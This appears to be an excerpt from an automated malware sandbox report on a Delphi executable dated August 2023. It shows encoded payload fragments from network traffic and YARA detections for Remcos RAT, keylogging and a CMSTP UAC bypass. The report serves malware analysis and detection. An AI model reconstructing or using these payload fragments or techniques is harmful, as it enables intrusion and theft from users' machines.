                                                                                          2023-08-23 17:31:32 UTC2792INData Raw: 50 79 38 76 4c 69 38 76 4c 79 45 76 4c 79 38 6d 48 79 54 66 4e 4a 38 76 4c 79 53 76 4c 79 38 76 72 79 38 76 4c 79 38 76 4c 79 39 2f 4c 36 38 6a 4e 68 38 76 4c 79 38 76 4c 79 6a 70 76 79 59 66 50 79 38 76 4c 36 38 76 4c 79 38 76 4c 79 38 72 4b 58 38 6d 48 7a 38 76 4c 79 2f 66 50 79 38 76 72 79 38 76 4c 45 6c 50 4a 68 38 2f 4c 79 38 72 72 79 38 76 49 43 38 76 4c 79 67 76 7a 7a 59 66 50 79 38 76 4c 39 38 2f 4c 79 43 76 4c 79 38 6d 6e 46 38 6d 48 7a 38 76 4c 79 34 76 4c 79 38 68 4c 79 38 76 4a 68 38 6d 2f 7a 45 76 4c 79 38 6d 6e 79 38 76 4c 36 38 76 4c 79 38 76 4c 79 38 76 62 79 2b 76 49 30 38 76 4c 79 38 76 72 79 38 6e 71 78 38 6d 48 7a 38 76 4c 79 2f 66 4c 79 38 76 4c 79 38 76 49 53 34 76 4a 68 38 2f 4c 79 38 76 7a 7a 38 76 4c 36 38 76 4c 79 77 6c 72 79 59
                                                                                          Data Ascii: Py8vLi8vLyEvLy8mHyTfNJ8vLySvLy8vry8vLy8vLy9/L68jNh8vLy8vLyjpvyYfPy8vL68vLy8vLy8rKX8mHz8vLy/fPy8vry8vLElPJh8/Ly8rry8vIC8vLygvzzYfPy8vL98/LyCvLy8mnF8mHz8vLy4vLy8hLy8vJh8m/zEvLy8mny8vL68vLy8vLy8vby+vI08vLy8vry8nqx8mHz8vLy/fLy8vLy8vIS4vJh8/Ly8vzz8vL68vLywlryY
                                                                                          2023-08-23 17:31:32 UTC2808INData Raw: 76 38 38 76 4c 79 61 58 65 79 4e 77 4d 70 5a 56 72 79 61 58 38 48 63 66 48 77 38 57 6b 42 5a 62 54 64 2b 57 6c 2f 39 33 54 78 38 50 46 74 65 32 56 46 59 57 6c 37 62 55 56 5a 61 58 74 6c 52 56 47 73 2f 2f 4c 79 38 6d 6c 2f 5a 55 55 37 62 58 2f 33 6a 50 48 77 38 57 55 42 71 62 78 71 66 62 79 73 54 50 4c 79 38 6d 6d 35 5a 55 56 4a 39 76 4c 79 38 6d 6c 37 5a 55 55 53 38 51 64 38 76 50 4c 79 61 58 57 32 47 37 57 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 35 70 64 64 35 5a 62 58 32 30 64 65 76 7a 4f 45 6c 70 66 66 38 34 6e 50 4c 79 61 58 2f 33 4d 5a 7a 79 38 6d 6c 63 75 67 46 32 6a 50 4c 79 38 75 68 69 44 76 4d 42 64 6f 4c 79 38 76 4b 73 2f 50 4c 79 38 74 31 70 64 65 76 30 4f 42 4a 70 66 66 39 70 6e 50 4c 79 61 58 2f 33 59
                                                                                          Data Ascii: v88vLyaXeyNwMpZVryaX8HcfHw8WkBZbTd+Wl/93Tx8PFte2VFYWl7bUVZaXtlRVGs//Ly8ml/ZUU7bX/3jPHw8WUBqbxqfbysTPLy8mm5ZUVJ9vLy8ml7ZUUS8Qd8vPLyaXW2G7W+vr6+vr6+vr6+vr6+vr6+vr6+vr5pdd5ZbX20devzOElpff84nPLyaX/3MZzy8mlcugF2jPLy8uhiDvMBdoLy8vKs/PLy8t1pdev0OBJpff9pnPLyaX/3Y
                                                                                          2023-08-23 17:31:32 UTC2824INData Raw: 73 31 38 66 48 78 76 72 36 2b 76 72 36 2b 76 6d 6c 39 74 6d 6c 37 47 2f 70 70 65 7a 4d 43 61 58 73 37 43 68 68 69 47 57 49 61 61 58 2b 61 47 2f 48 78 38 57 6c 7a 33 6f 4c 7a 38 76 4a 70 66 66 65 78 50 66 4c 79 61 56 53 32 61 58 74 33 63 76 4c 79 38 6d 6c 39 70 38 72 79 38 76 4a 74 66 61 66 53 38 76 4c 79 56 4d 31 69 66 65 70 36 48 30 56 69 65 68 39 46 59 58 6f 66 52 57 4e 61 45 41 46 32 6b 50 54 79 38 6c 71 50 77 76 4c 79 38 67 46 32 68 50 54 79 38 6e 65 37 4f 50 70 33 78 41 46 32 65 50 54 79 38 6d 4b 78 38 2f 4c 79 38 6d 5a 63 77 51 46 32 4f 50 54 79 38 6d 6c 2f 46 30 56 6c 61 58 39 74 52 57 4c 78 42 31 69 52 38 76 4a 61 48 30 56 6c 4f 45 39 70 66 2f 64 54 77 2f 44 78 59 71 72 58 38 76 4b 79 61 58 74 6c 52 56 46 70 66 2f 66 53 79 76 44 78 59 6e 33 4b 61
                                                                                          Data Ascii: s18fHxvr6+vr6+vml9tml7G/ppezMCaXs7ChhiGWIaaX+aG/Hx8Wlz3oLz8vJpffexPfLyaVS2aXt3cvLy8ml9p8ry8vJtfafS8vLyVM1ifep6H0Vieh9FYXofRWNaEAF2kPTy8lqPwvLy8gF2hPTy8ne7OPp3xAF2ePTy8mKx8/Ly8mZcwQF2OPTy8ml/F0VlaX9tRWLxB1iR8vJaH0VlOE9pf/dTw/DxYqrX8vKyaXtlRVFpf/fSyvDxYn3Ka
                                                                                          2023-08-23 17:31:32 UTC2840INData Raw: 55 53 43 66 4c 79 38 6d 4a 39 79 6d 4a 2f 62 55 58 7a 32 7a 44 7a 38 76 4a 39 51 42 4e 33 38 54 6a 35 56 4d 33 62 4e 66 50 79 38 6e 39 6f 38 57 6c 2f 56 6a 53 61 38 50 47 72 42 66 4c 79 38 6c 35 31 53 50 76 79 41 58 6c 30 38 76 4c 79 5a 6e 65 37 4e 2f 64 69 58 4f 73 32 78 79 6c 37 62 74 70 74 66 32 62 53 61 58 32 38 75 57 62 53 2b 66 4c 79 38 6e 74 41 34 74 6f 30 37 66 48 78 66 63 70 33 73 6a 63 51 61 58 39 65 4d 35 50 77 38 57 56 39 73 6d 6c 37 50 30 56 52 61 58 73 33 52 55 6d 35 5a 55 55 53 57 66 4c 79 38 74 30 6d 73 50 50 79 38 76 4a 39 77 57 56 39 32 4e 72 59 37 76 48 78 66 63 70 33 73 6a 64 30 61 58 39 65 58 70 50 77 38 57 6c 2f 39 34 43 6f 38 50 46 6c 66 62 56 70 65 7a 39 46 55 57 6c 37 5a 55 56 4a 75 57 56 46 45 6c 33 79 38 76 4c 64 54 32 6c 2f 58
                                                                                          Data Ascii: USCfLy8mJ9ymJ/bUXz2zDz8vJ9QBN38Tj5VM3bNfPy8n9o8Wl/VjSa8PGrBfLy8l51SPvyAXl08vLyZne7N/diXOs2xyl7btptf2bSaX28uWbS+fLy8ntA4to07fHxfcp3sjcQaX9eM5Pw8WV9sml7P0VRaXs3RUm5ZUUSWfLy8t0msPPy8vJ9wWV92NrY7vHxfcp3sjd0aX9eXpPw8Wl/94Co8PFlfbVpez9FUWl7ZUVJuWVFEl3y8vLdT2l/X
                                                                                          2023-08-23 17:31:32 UTC2856INData Raw: 6d 79 39 7a 50 32 49 2f 56 52 39 42 50 79 38 6d 32 54 38 2f 4a 36 38 76 4c 79 38 78 48 38 38 68 46 56 43 50 49 52 70 41 72 69 43 4e 49 47 77 67 53 79 41 6a 4d 42 49 77 41 54 43 30 7a 33 38 67 76 7a 65 50 49 45 4d 77 4d 6a 41 6c 48 79 38 6d 32 54 38 2f 49 53 39 76 4c 79 38 77 58 36 38 67 55 58 41 50 49 46 56 66 37 79 42 54 55 42 30 76 38 7a 2f 69 50 7a 44 76 37 79 44 69 63 44 38 67 34 58 41 76 49 4f 56 51 48 79 44 6a 55 4b 34 67 6a 53 42 73 49 45 73 67 49 7a 38 78 44 38 38 68 41 33 43 66 49 51 4a 77 6a 79 45 46 55 47 38 68 44 6b 42 75 49 45 30 67 49 54 38 2f 7a 32 38 76 78 56 41 50 4c 38 70 50 67 7a 38 2f 6a 30 38 76 67 31 39 46 45 4c 56 50 33 79 51 7a 64 5a 38 6b 4d 6e 57 50 4a 44 56 56 66 79 51 2f 4e 54 38 67 62 69 42 4e 49 43 45 2f 4c 79 62 5a 50 7a 38
                                                                                          Data Ascii: my9zP2I/VR9BPy8m2T8/J68vLy8xH88hFVCPIRpAriCNIGwgSyAjMBIwATC0z38gvzePIEMwMjAlHy8m2T8/IS9vLy8wX68gUXAPIFVf7yBTUB0v8z/iPzDv7yDicD8g4XAvIOVQHyDjUK4gjSBsIEsgIz8xD88hA3CfIQJwjyEFUG8hDkBuIE0gIT8/z28vxVAPL8pPgz8/j08vg19FELVP3yQzdZ8kMnWPJDVVfyQ/NT8gbiBNICE/LybZPz8
                                                                                          2023-08-23 17:31:32 UTC2872INData Raw: 72 79 55 66 4a 56 38 6d 50 79 55 66 4c 79 38 6d 33 79 43 50 4c 7a 38 6d 54 79 4d 76 49 77 38 6a 50 79 4a 50 49 78 38 6a 7a 79 62 2f 49 6b 38 6a 44 79 4b 50 4c 79 38 76 4c 79 62 76 49 73 38 69 62 79 4e 66 49 79 38 6a 62 79 4d 76 49 70 38 6a 66 79 45 76 4a 6b 38 6a 4c 79 4e 66 49 7a 38 6a 4c 79 4e 66 49 6b 38 6a 66 79 4c 50 49 79 38 6a 48 79 38 76 49 6a 38 67 37 79 38 2f 4a 6e 38 69 7a 79 4c 2f 49 6f 38 6d 58 79 4b 50 49 32 38 69 62 79 4e 66 49 73 38 6a 50 79 4e 2f 49 73 38 6a 4c 79 4d 66 4c 79 38 76 4c 79 5a 76 49 37 38 69 62 79 4b 2f 49 6b 38 6a 48 79 4b 76 49 6f 38 68 4c 79 59 76 49 6d 38 6a 66 79 4c 50 49 35 38 69 6a 79 46 76 49 38 38 6a 48 79 4a 76 49 53 38 6d 72 79 4d 66 49 35 38 6a 4c 79 4c 76 49 6f 38 6a 58 79 38 76 49 7a 38 6b 6e 79 38 2f 4a 6e 38
                                                                                          Data Ascii: ryUfJV8mPyUfLy8m3yCPLz8mTyMvIw8jPyJPIx8jzyb/Ik8jDyKPLy8vLybvIs8ibyNfIy8jbyMvIp8jfyEvJk8jLyNfIz8jLyNfIk8jfyLPIy8jHy8vIj8g7y8/Jn8izyL/Io8mXyKPI28ibyNfIs8jPyN/Is8jLyMfLy8vLyZvI78ibyK/Ik8jHyKvIo8hLyYvIm8jfyLPI58ijyFvI88jHyJvIS8mryMfI58jLyLvIo8jXy8vIz8kny8/Jn8
                                                                                          2023-08-23 17:31:32 UTC2888INData Raw: 2f 54 53 39 41 43 77 30 37 73 6e 48 70 61 6c 6d 5a 55 4f 36 6e 65 58 54 6f 35 55 74 55 54 68 38 45 51 68 66 6a 36 50 53 39 75 6c 6f 32 52 52 39 64 32 73 65 32 51 55 6b 39 4c 30 6f 32 41 53 42 41 63 67 76 7a 64 50 4f 4a 7a 68 53 71 53 63 71 41 42 35 33 55 61 53 77 79 6a 48 6c 4a 6e 59 2f 41 72 46 58 49 53 57 61 6f 57 46 57 61 39 63 44 61 51 70 57 70 52 48 71 4c 41 4d 6d 43 56 33 46 6f 78 65 2b 4d 59 65 78 4a 4e 46 41 55 53 4c 58 55 72 42 32 4f 51 75 33 65 4c 6a 73 43 42 64 61 59 79 69 4d 2f 2b 6c 56 33 68 42 58 6e 2b 51 59 78 2f 31 41 67 38 39 50 58 7a 38 76 4f 56 64 50 4d 4e 55 58 54 7a 43 56 45 50 2b 50 55 59 44 77 44 32 43 50 59 47 54 4a 66 62 41 68 62 43 42 4f 55 4c 44 57 46 4e 2f 47 34 4a 76 72 5a 6d 75 30 39 52 45 66 6a 31 47 41 39 45 39 67 70 52 43
                                                                                          Data Ascii: /TS9ACw07snHpalmZUO6neXTo5UtUTh8EQhfj6PS9ulo2RR9d2se2QUk9L0o2ASBAcgvzdPOJzhSqScqAB53UaSwyjHlJnY/ArFXISWaoWFWa9cDaQpWpRHqLAMmCV3Foxe+MYexJNFAUSLXUrB2OQu3eLjsCBdaYyiM/+lV3hBXn+QYx/1Ag89PXz8vOVdPMNUXTzCVEP+PUYDwD2CPYGTJfbAhbCBOULDWFN/G4JvrZmu09REfj1GA9E9gpRC
                                                                                          2023-08-23 17:31:32 UTC2904INData Raw: 68 6b 5a 46 73 53 53 57 68 76 47 45 6f 53 56 55 39 61 54 31 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 61 47 52 6b 57 78 4a 4a 61 47 38 59 53 68 4a 56 54 31 70 50 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38
                                                                                          Data Ascii: hkZFsSSWhvGEoSVU9aT1Py8vLy8vLy8vLy8vLy8vLyaGRkWxJJaG8YShJVT1pPU/Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
                                                                                          2023-08-23 17:31:32 UTC2920INData Raw: 4b 35 42 76 4c 79 53 50 4d 56 39 44 6e 79 53 50 4d 55 38 31 46 49 38 78 76 30 50 2f 4c 79 53 63 49 46 58 53 54 79 38 76 4c 79 72 67 6e 79 38 6b 6a 7a 46 66 51 35 38 6b 6a 7a 46 50 4e 54 53 50 4d 62 39 44 2f 79 38 76 4a 63 5a 53 38 76 62 69 51 73 4d 57 51 56 46 78 59 33 4a 44 55 33 4f 44 50 79 38 35 50 73 39 76 4c 79 30 67 56 64 4a 50 4c 79 38 76 4a 77 38 76 4c 79 38 76 4c 79 38 76 4f 4f 6d 77 66 79 38 6b 74 46 38 76 4c 79 38 35 4f 4e 39 2f 4c 79 4d 66 72 79 38 6b 74 51 38 76 4c 79 38 35 4e 43 39 2f 4c 79 77 50 72 79 38 6b 74 5a 38 76 4c 79 38 35 4e 59 39 2f 4c 79 54 2f 76 79 38 6c 33 78 42 56 30 6b 38 76 4c 79 38 73 45 45 38 76 49 74 42 2f 4c 79 53 50 4d 56 39 65 58 7a 46 55 6a 7a 46 50 58 6c 38 78 52 49 38 78 76 31 35 66 4d 62 38 6c 4d 46 42 6c 30 6b 38
                                                                                          Data Ascii: K5BvLySPMV9DnySPMU81FI8xv0P/LyScIFXSTy8vLyrgny8kjzFfQ58kjzFPNTSPMb9D/y8vJcZS8vbiQsMWQVFxY3JDU3ODPy85Ps9vLy0gVdJPLy8vJw8vLy8vLy8vOOmwfy8ktF8vLy85ON9/LyMfry8ktQ8vLy85NC9/LywPry8ktZ8vLy85NY9/LyT/vy8l3xBV0k8vLy8sEE8vItB/LySPMV9eXzFUjzFPXl8xRI8xv15fMb8lMFBl0k8
                                                                                          2023-08-23 17:31:32 UTC2936INData Raw: 59 6f 4d 7a 63 73 4d 6a 46 6e 4c 79 51 71 4e 76 4c 30 68 66 73 4f 39 2f 4c 79 39 76 74 37 38 76 4c 79 39 49 62 37 49 76 50 79 38 76 72 36 5a 6a 73 6d 4b 44 4d 33 4c 44 49 78 59 69 63 6e 4e 53 67 32 4e 76 4c 30 68 2f 75 42 39 2f 4c 79 41 76 70 76 4f 44 41 6c 4b 44 55 54 4a 44 55 6b 4d 43 67 33 4b 44 55 32 38 76 53 49 2b 77 37 33 38 76 49 4b 2b 6d 59 37 4a 69 67 7a 4e 79 77 79 4d 57 6f 78 4b 54 49 31 4d 43 51 33 4c 44 49 78 38 76 53 4a 2b 36 6e 37 38 76 49 53 38 76 7a 36 39 76 6f 4a 39 50 4c 79 2f 53 4a 6b 63 47 38 58 5a 68 73 58 38 73 4c 32 39 48 50 34 39 76 66 79 38 76 6f 54 55 6d 6b 79 4d 43 6a 79 39 48 54 34 63 76 66 79 38 76 4c 36 45 31 4e 70 4d 6a 41 6f 38 76 52 31 2b 48 4c 33 38 76 4c 36 2b 68 4e 55 61 54 49 77 4b 50 4c 30 64 76 68 79 39 2f 4c 79 41
                                                                                          Data Ascii: YoMzcsMjFnLyQqNvL0hfsO9/Ly9vt78vLy9Ib7IvPy8vr6ZjsmKDM3LDIxYicnNSg2NvL0h/uB9/LyAvpvODAlKDUTJDUkMCg3KDU28vSI+w738vIK+mY7JigzNywyMWoxKTI1MCQ3LDIx8vSJ+6n78vIS8vz69voJ9PLy/SJkcG8XZhsX8sL29HP49vfy8voTUmkyMCjy9HT4cvfy8vL6E1NpMjAo8vR1+HL38vL6+hNUaTIwKPL0dvhy9/LyA
                                                                                          2023-08-23 17:31:32 UTC2952INData Raw: 41 77 4c 44 66 79 39 36 45 49 35 76 50 79 38 68 50 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 78 55 6f 4e 69 67 31 4f 53 6a 79 39 36 49 49 35 76 50 79 38 68 76 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 32 51 79 4d 44 41 73 4e 2f 4c 33 6f 77 6a 6d 38 2f 4c 79 49 2f 78 74 4d 69 51 6e 4b 44 56 6e 4c 79 51 71 4e 76 4c 33 70 41 67 31 38 2f 4c 79 4b 2f 78 76 4f 44 41 6c 4b 44 56 77 4b 52 55 35 4a 47 49 78 4a 78 59 73 50 53 67 32 38 76 65 6c 43 44 58 7a 38 76 49 76 2f 47 55 6b 4e 79 52 6c 4c 44 55 6f 4a 6a 63 79 4e 54 7a 79 39 36 59 49 2b 50 66 79 38 6a 50 79 2b 47 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59 6d 56 6d 46 56 64 56 38 76 65 6e 43 41 6a 33 38 76 4c 34 45 32 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59
                                                                                          Data Ascii: AwLDfy96EI5vPy8hP8Fiw9KHApaSgkMxUoNig1OSjy96II5vPy8hv8Fiw9KHApaSgkM2QyMDAsN/L3owjm8/LyI/xtMiQnKDVnLyQqNvL3pAg18/LyK/xvODAlKDVwKRU5JGIxJxYsPSg28velCDXz8vIv/GUkNyRlLDUoJjcyNTzy96YI+Pfy8jPy+GpuYmhmInATF2pwb2JtImlmYmVmFVdV8venCAj38vL4E2puYmhmInATF2pwb2JtImlmY
                                                                                          2023-08-23 17:31:32 UTC2968INData Raw: 48 79 2f 66 31 71 42 66 4c 79 39 67 58 7a 39 66 72 39 2f 56 76 39 58 50 66 7a 42 66 4c 79 39 2f 2f 79 39 66 70 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 50 2f 79 39 51 42 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 51 48 79 2f 66 33 79 38 76 6f 46 38 2f 58 36 2f 66 64 62 2f 56 7a 33 38 77 58 79 38 76 76 2f 38 6d 6f 46 57 66 66 79 38 76 7a 2f 38 76 58 36 57 2f 31 63 39 32 6f 46 57 66 66 79 38 76 30 49 38 76 58 36 57 2f 31 63 2f 57 6f 46 38 76 4c 2b 43 50 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 2f 77 58 7a 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 41 4a 38 2f 58 36 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 48 2f 38 6d 6f 46 38 76 49 43 2f 2f 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 41 2f 50 7a 61 67 58 7a 42 66 4c 79 42 45 4c 79 61 67 56 51 2f 66 4c 79 42
                                                                                          Data Ascii: Hy/f1qBfLy9gXz9fr9/Vv9XPfzBfLy9//y9fpb/Vz3agVZ/fLy+P/y9QBb/Vz3agVZ/fLy+QHy/f3y8voF8/X6/fdb/Vz38wXy8vv/8moFWffy8vz/8vX6W/1c92oFWffy8v0I8vX6W/1c/WoF8vL+CPL1+lv9XPdqBfLy/wXz/f1b/Vz38wXy8gAJ8/X6/f1b/Vz38wXy8gH/8moF8vIC//L1+lv9XPdqBfLyA/PzagXzBfLyBELyagVQ/fLyB
                                                                                          2023-08-23 17:31:32 UTC2984INData Raw: 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38
                                                                                          Data Ascii: Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
                                                                                          2023-08-23 17:31:32 UTC3000INData Raw: 4c 79 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 30 38 76 4c 79 38 76 4c 79 2f 76 54 79 38 76 4c 79 38 76 4c 7a 38 68 54 2b 39 50 4c 79 38 76 4c 79 38 67 48 30 38 76 4c 79 38 76 4c 79 39 76 4c 6c 38 78 53 52 41 66 54 79 38 76 4c 79 38 76 49 47 39 50 4c 79 38 76 4c 79 38 76 50 79 46 41 62 30 38 76 4c 79 38 76 4c 79 43 66 54 79 38 76 4c 79 38 76 4c 32 38 75 58 7a 46 4a 45 4a 39 50 4c 79 38 76 4c 79 38 6b 58 30 38 76 4c 79 38 76 4c 79 38 2f 49 55 52 66 54 79 38 76 4c 79 38 76 4a 49 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4b 43 38 2f 4c 79 38 76 4c 79 38 70 7a 7a 38 76 4c 79 38 76 4c 79 38 2f 49 62 6e 50 50 79 38 76 4c 79 38 76 4b 6d 38 2f 4c 79 38 76 4c 79 38 76 62 79 35
                                                                                          Data Ascii: Ly9PLy8vLy8vby5fMUkfL08vLy8vLy/vTy8vLy8vLz8hT+9PLy8vLy8gH08vLy8vLy9vLl8xSRAfTy8vLy8vIG9PLy8vLy8vPyFAb08vLy8vLyCfTy8vLy8vL28uXzFJEJ9PLy8vLy8kX08vLy8vLy8/IURfTy8vLy8vJI9PLy8vLy8vby5fMUkfLy8vLy8vLy8vLy8vLy8vKC8/Ly8vLy8pzz8vLy8vLy8/IbnPPy8vLy8vKm8/Ly8vLy8vby5
                                                                                          2023-08-23 17:31:32 UTC3016INData Raw: 6a 30 38 76 49 72 66 50 4c 79 2f 2f 4c 79 38 76 58 7a 6e 50 4c 79 38 76 62 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 67 54 30 38 76 4a 59 42 2f 4c 79 41 50 4c 79 38 76 58 7a 42 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 6d 6e 30 38 76 4a 34 42 50 4c 79 41 66 4c 79 38 76 58 7a 50 76 4c 79 38 76 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 7a 63 6f 4f 7a 66 79 38 76 49 53 43 76 4c 79 38 2f 4c 79 38 76 58 7a 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 63 6b 4e 79 54 79 38 76 4a 52 38 76 4c 79 39 50 4c 79 38 76 58 7a 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 55 32 4e 76 4c 79 38 76 4a 68 2b 2f 4c 79 2b 50 4c 79 38
                                                                                          Data Ascii: j08vIrfPLy//Ly8vXznPLy8vby8vLy8vLy8vLy8vLy8vLy8gT08vJYB/LyAPLy8vXzBvLy8vLy8vLy8vLy8vLy8vLy8vLy8mn08vJ4BPLyAfLy8vXzPvLy8vPy8vLy8vLy8vLy8vLyTzcoOzfy8vISCvLy8/Ly8vXzU/Ly8vLy8vLy8vLy8vLy8vLyTyckNyTy8vJR8vLy9PLy8vXz8vLy8vLy8vLy8vLy8vLy8vLyTyU2NvLy8vJh+/Ly+PLy8
                                                                                          2023-08-23 17:31:32 UTC3032INData Raw: 38 6d 38 69 49 69 4d 43 77 78 4b 6a 6f 33 4b 7a 55 69 4e 54 67 78 49 69 34 6f 50 43 49 6e 4e 7a 49 31 4e 6b 38 7a 4a 44 55 33 54 31 48 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 76 49 75 4b 44 77 69 4a 7a 63 79 4e 53 49 76 4c 44 59 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6b 4a 79 63 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 69 49 73 4d 53 77 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 31 4b 44 41 79 4f 53 67 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 69 49 58 62 52 59 6d 4a 43 38 76 4a 53 51 6d 4c 76 4a 6c 4c 79 39 6d 4d 54 63 31 50 42 4d 79 4c 44 45 33 38 69 49 69 49 68 55 59 62 78 64 71 62 6d 59 69 45 78 5a 6d 47
                                                                                          Data Ascii: 8m8iIiMCwxKjo3KzUiNTgxIi4oPCInNzI1Nk8zJDU3T1HyIiIwLDEqOjcrNSImNvIuKDwiJzcyNSIvLDY38iIiIjpXVSIwLDEqOjcrNSIkJyciLig8Iic3MjXyIiIwLDEqOjcrNSImNiIsMSw38iIiIjpXVSIwLDEqOjcrNSI1KDAyOSgiLig8Iic3MjXyIiIwLDEqOiIXbRYmJC8vJSQmLvJlLy9mMTc1PBMyLDE38iIiIhUYbxdqbmYiExZmG


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:19:30:02
                                                                                          Start date:23/08/2023
                                                                                          Path:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:1'131'463 bytes
                                                                                          MD5 hash:533B3DF0E597C50E1129EC807FD6BBCF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:Borland Delphi
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
